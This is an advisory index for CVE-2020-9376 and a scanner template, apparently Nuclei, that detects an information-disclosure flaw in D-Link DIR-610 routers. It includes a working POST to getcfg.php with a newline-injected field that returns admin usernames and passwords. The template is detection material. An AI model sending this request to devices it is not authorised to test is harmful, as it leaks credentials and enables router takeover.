| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2020-9376 | 12 Dec 2022 13:30 | – | circl |
| D-Link DIR-610 Information Disclosure Vulnerability | 12 Jul 2020 00:00 | – | cnvd |
| CVE-2020-9376 | 9 Jul 2020 12:08 | – | cve |
| CVE-2020-9376 | 9 Jul 2020 12:08 | – | cvelist |
| DLink DIR-610 Multiple Vulnerabilities | 9 Feb 2024 00:00 | – | nessus |
| CVE-2020-9376 | 9 Jul 2020 13:15 | – | nvd |
| D-Link DIR-610 Rev. A Devices Multiple Vulnerabilities | 22 Feb 2023 00:00 | – | openvas |
| Information disclosure | 9 Jul 2020 13:15 | – | prion |
| PT-2020-20620 · D Link · Dir-610 | 9 Jul 2020 00:00 | – | ptsecurity |
| CVE-2020-9376 | 22 May 2025 17:35 | – | redhatcve |

```yaml
id: CVE-2020-9376

info:
  name: D-Link DIR-610 Devices - Information Disclosure
  author: whynotke
  severity: high
  description: |
    D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
    NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
  impact: |
    An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the vulnerability.
  reference:
    - https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
    - https://www.dlink.com.br/produto/dir-610/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9376
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-9376
    cwe-id: CWE-74
    epss-score: 0.16586
    epss-percentile: 0.96613
    cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-610_firmware
  tags: cve,cve2020,dlink,disclosure,router,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/getcfg.php"

    body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<name>Admin</name>"
          - "</usrid>"
          - "</password>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210090793549bcb9cf70b12cb64dad3cd405a6fcc111e5b608d7270b5310eecbd952022100d96b2999a169b1580cd65792010e9ac5951c5d1e36abd1c46638fa60b6a62b9a:922c64590222798bb761d5b6d8e72950
```